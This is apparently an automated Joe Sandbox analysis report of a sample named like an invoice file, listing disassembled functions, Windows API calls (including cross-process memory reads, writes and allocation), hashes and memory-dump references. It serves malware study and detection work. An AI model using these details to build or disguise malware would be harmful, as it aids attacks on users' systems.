                                                                            • Instruction ID: 9148bd8207d60d0e18c2a1ad56f5fc1b624a5f4f7a312f6b4cd82280bd23bb17
                                                                            • Opcode Fuzzy Hash: 16c20c5bcd9057950e95b6fd206f53e52e04a13a6cabff10c790e3e6c62e8a63
                                                                            • Instruction Fuzzy Hash: CB018B30904718D7EB206B64FD4EF9677B8FF00706F0006A9F682A14E1DBF46958AB91
                                                                            Function 00ED13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EndPath.GDI32(?), ref: 00ED13BF
                                                                            • StrokeAndFillPath.GDI32(?,?,00F0B888,00000000,?), ref: 00ED13DB
                                                                            • SelectObject.GDI32(?,00000000), ref: 00ED13EE
                                                                            • DeleteObject.GDI32 ref: 00ED1401
                                                                            • StrokePath.GDI32(?), ref: 00ED141C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                            • String ID:
                                                                            • API String ID: 2625713937-0
                                                                            • Opcode ID: e042b42f2934d98deab7c95db7ec78cc7cc013eaa8c240f073acd87a81b6a6d9
                                                                            • Instruction ID: 429c4c674904d8b2822f29dffadb70eecda662df95555790cb8809e6b5ea1da4
                                                                            • Opcode Fuzzy Hash: e042b42f2934d98deab7c95db7ec78cc7cc013eaa8c240f073acd87a81b6a6d9
                                                                            • Instruction Fuzzy Hash: 47F0E730405B0CEBDB125F26EC4C7583FA4EB0172AF0892A6E529991F1C731899AEF50
                                                                            Function 00F28992 Relevance: 7.5, APIs: 5, Instructions: 23memorysynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F2899D
                                                                            • CloseHandle.KERNEL32(?), ref: 00F289B2
                                                                            • CloseHandle.KERNEL32(?), ref: 00F289BA
                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00F289C3
                                                                            • HeapFree.KERNEL32(00000000), ref: 00F289CA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                                                                            • String ID:
                                                                            • API String ID: 3751786701-0
                                                                            • Opcode ID: c9e66b17401a949f9c73dcde777b6a8f759fae44859c40939d51645e491f4d35
                                                                            • Instruction ID: a1512b1a25ac41438a20eaffc439eb23b660bfa9f0839c212a3e91d06bd8e0de
                                                                            • Opcode Fuzzy Hash: c9e66b17401a949f9c73dcde777b6a8f759fae44859c40939d51645e491f4d35
                                                                            • Instruction Fuzzy Hash: BBE05276105609FBDA012FE5EC0C95ABB69FB89763B508671F31981470CB32A469EB50
                                                                            Function 00F3C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 00F3C432
                                                                            • CoCreateInstance.COMBASE(00F62D6C,00000000,00000001,00F62BDC,?), ref: 00F3C44A
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                            • CoUninitialize.COMBASE ref: 00F3C6B7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                            • String ID: .lnk
                                                                            • API String ID: 2683427295-24824748
                                                                            • Opcode ID: 00caaa21a4d2ff098758bf6cd0af39f15157e300fdf2d15bd689eea2704c8f25
                                                                            • Instruction ID: a304b17215e65cc66e935acf2a52514d58b8876022353c4150569a07dd36b25c
                                                                            • Opcode Fuzzy Hash: 00caaa21a4d2ff098758bf6cd0af39f15157e300fdf2d15bd689eea2704c8f25
                                                                            • Instruction Fuzzy Hash: 0AA13A71104205AFD700EF54CC91EAFB7E8EF95354F00491DF595AB2A2EB71EA0ACB62
                                                                            Function 00EE2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00EF0DB6: std::exception::exception.LIBCMT ref: 00EF0DEC
                                                                              • Part of subcall function 00EF0DB6: __CxxThrowException@8.LIBCMT ref: 00EF0E01
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                              • Part of subcall function 00ED7A51: _memmove.LIBCMT ref: 00ED7AAB
                                                                            • __swprintf.LIBCMT ref: 00EE2ECD
                                                                            Strings
                                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00EE2D66
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                            • API String ID: 1943609520-557222456
                                                                            • Opcode ID: b9c0575960f7f36cf2964786b6c273b386453f7c9246d035c1ca152ecc7072e1
                                                                            • Instruction ID: 5e95371f3e4e559215e746b16c5714ddb8154f8b0b6027ad6ee7074a358f9e7f
                                                                            • Opcode Fuzzy Hash: b9c0575960f7f36cf2964786b6c273b386453f7c9246d035c1ca152ecc7072e1
                                                                            • Instruction Fuzzy Hash: 72918C725082559FC714EF24C895CAEB7E8EF85310F00691EF595EB2A2EB30ED45CB52
                                                                            Function 00F3B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00ED4743,?,?,00ED37AE,?), ref: 00ED4770
                                                                            • CoInitialize.OLE32(00000000), ref: 00F3B9BB
                                                                            • CoCreateInstance.COMBASE(00F62D6C,00000000,00000001,00F62BDC,?), ref: 00F3B9D4
                                                                            • CoUninitialize.COMBASE ref: 00F3B9F1
                                                                              • Part of subcall function 00ED9837: __itow.LIBCMT ref: 00ED9862
                                                                              • Part of subcall function 00ED9837: __swprintf.LIBCMT ref: 00ED98AC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                            • String ID: .lnk
                                                                            • API String ID: 2126378814-24824748
                                                                            • Opcode ID: 64a0e1c988e37fe2758012bb2f47b43876505ae2da038a079ee51c6929cf9964
                                                                            • Instruction ID: 8bef61089999538da7f82e42e4d9ac55957cb85a69b2129c9d3831c376926429
                                                                            • Opcode Fuzzy Hash: 64a0e1c988e37fe2758012bb2f47b43876505ae2da038a079ee51c6929cf9964
                                                                            • Instruction Fuzzy Hash: 2AA18A75A043059FCB04DF14C894D2ABBE5FF89324F048989F9999B3A2CB31EC46DB91
                                                                            Function 00EF501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __startOneArgErrorHandling.LIBCMT ref: 00EF50AD
                                                                              • Part of subcall function 00F000F0: __87except.LIBCMT ref: 00F0012B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorHandling__87except__start
                                                                            • String ID: pow
                                                                            • API String ID: 2905807303-2276729525
                                                                            • Opcode ID: a7502f03be534e5884a10857306f7cc4f0afd8a0a8ecb0b959e19940fc954a49
                                                                            • Instruction ID: 7d75c5fd86fe2d4a2542838db69f5e2d61f14f16ce3f586646a23a3c03c2d0d8
                                                                            • Opcode Fuzzy Hash: a7502f03be534e5884a10857306f7cc4f0afd8a0a8ecb0b959e19940fc954a49
                                                                            • Instruction Fuzzy Hash: 6351AA32E0DA0AC6DB117724CC0137E3BD49B60314F208D99E6D5962E9EF388DC4BB86
                                                                            Function 00F18584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: 3c$_
                                                                            • API String ID: 4104443479-4099079164
                                                                            • Opcode ID: 13749348f3b1f02bb50c20d8f82ad8e31d923af4cf780b541a7935a1ea1d678c
                                                                            • Instruction ID: ef241fee581034b166d2a6780ca4b0859ae6f30b47f7d6d7bc84d1ef061b224b
                                                                            • Opcode Fuzzy Hash: 13749348f3b1f02bb50c20d8f82ad8e31d923af4cf780b541a7935a1ea1d678c
                                                                            • Instruction Fuzzy Hash: 7F514DB0D00609DFCB24CF68C984AEEB7B1FF44354F148529E85AE7250EB31A996DB51
                                                                            Function 00F297F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00F314BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F29296,?,?,00000034,00000800,?,00000034), ref: 00F314E6
                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F2983F
                                                                              • Part of subcall function 00F31487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F292C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00F314B1
                                                                              • Part of subcall function 00F313DE: GetWindowThreadProcessId.USER32(?,?), ref: 00F31409
                                                                              • Part of subcall function 00F313DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F2925A,00000034,?,?,00001004,00000000,00000000), ref: 00F31419
                                                                              • Part of subcall function 00F313DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F2925A,00000034,?,?,00001004,00000000,00000000), ref: 00F3142F
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F298AC
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F298F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                            • String ID: @
                                                                            • API String ID: 4150878124-2766056989
                                                                            • Opcode ID: 8d1b165bc5b1f9168588a76c9084715056720429f2c98dbe694a5d34c15ec766
                                                                            • Instruction ID: f6fa74e16f4915e6b43700b3b474cf0b5455e9d100a845eb0a2629da1d1f5821
                                                                            • Opcode Fuzzy Hash: 8d1b165bc5b1f9168588a76c9084715056720429f2c98dbe694a5d34c15ec766
                                                                            • Instruction Fuzzy Hash: D0413E7690121CAFDB10DFA4CD81ADEBBB8EB09310F004199FA45B7191DA756E89DBA0
                                                                            Function 00F57946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F5F910,00000000,?,?,?,?), ref: 00F579DF
                                                                            • GetWindowLongW.USER32 ref: 00F579FC
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F57A0C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long
                                                                            • String ID: SysTreeView32
                                                                            • API String ID: 847901565-1698111956
                                                                            • Opcode ID: 618c38aa476090a0b946eba8db52f63d3acfd338c484187ca76761bf4dac11f0
                                                                            • Instruction ID: 11077aeb9a678892847107b9cfc980f74f99fccb754f7a62e976ad90dcc4e9f7
                                                                            • Opcode Fuzzy Hash: 618c38aa476090a0b946eba8db52f63d3acfd338c484187ca76761bf4dac11f0
                                                                            • Instruction Fuzzy Hash: 9C31103160420AABDB119E38DC01BEA37A9EF05331F204725FA75A32E0D730ED55AB60
                                                                            Function 00F573D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F57461
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F57475
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F57499
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window
                                                                            • String ID: SysMonthCal32
                                                                            • API String ID: 2326795674-1439706946
                                                                            • Opcode ID: 5305c300da864a64a31eac63bd92267edce4d106014f1861ed61bf6d7dd613ff
                                                                            • Instruction ID: 146ddddc814fe771ab78963ddf39155f028e3048d285860f5cebe5fb2e50ea39
                                                                            • Opcode Fuzzy Hash: 5305c300da864a64a31eac63bd92267edce4d106014f1861ed61bf6d7dd613ff
                                                                            • Instruction Fuzzy Hash: 1F219F32500218ABDF11DFA4DC46FEA3BAAEB48725F110214FF156B190DAB5AC55EBA0
                                                                            Function 00F57B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F57C4A
                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F57C58
                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F57C5F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DestroyWindow
                                                                            • String ID: msctls_updown32
                                                                            • API String ID: 4014797782-2298589950
                                                                            • Opcode ID: e42d26403d21f6760e4e30172deee4b4c714e5f28c042bf67dfcd20f6f7c29ff
                                                                            • Instruction ID: 3058382104b52ea0168729197e4818c5f321c9ea50f3aa7ee82ade022cf4a0c0
                                                                            • Opcode Fuzzy Hash: e42d26403d21f6760e4e30172deee4b4c714e5f28c042bf67dfcd20f6f7c29ff
                                                                            • Instruction Fuzzy Hash: D9217FB1604208AFDB11EF28DCC5DA737ECEB4A365B140059FA019B3A1CB31EC05AB60
                                                                            Function 00F56CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F56D3B
                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F56D4B
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F56D70
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$MoveWindow
                                                                            • String ID: Listbox
                                                                            • API String ID: 3315199576-2633736733
                                                                            • Opcode ID: f9c61e924b63cf6bd5cef3d9c96d2888120b72d78890ed020621b8879b305f2f
                                                                            • Instruction ID: 7bb720b5088d9e4e0a4dcbd6c8d54d054d8c17267108823f2c76da1df1b51e44
                                                                            • Opcode Fuzzy Hash: f9c61e924b63cf6bd5cef3d9c96d2888120b72d78890ed020621b8879b305f2f
                                                                            • Instruction Fuzzy Hash: BD21D432A00118BFDF118F54CC45FBB3BBAEF89762F418124FE559B1A0CA719C55ABA0
                                                                            Function 00F5770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F57772
                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F57787
                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F57794
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: msctls_trackbar32
                                                                            • API String ID: 3850602802-1010561917
                                                                            • Opcode ID: 9c07a67ad7d189f2110ac7f20e6ccb62c236e42e7c018859a332b46990517f97
                                                                            • Instruction ID: 094cfd80d9791684f46baa7b8b2c51d9b51e1371423f0a163e6d6df2e15fda48
                                                                            • Opcode Fuzzy Hash: 9c07a67ad7d189f2110ac7f20e6ccb62c236e42e7c018859a332b46990517f97
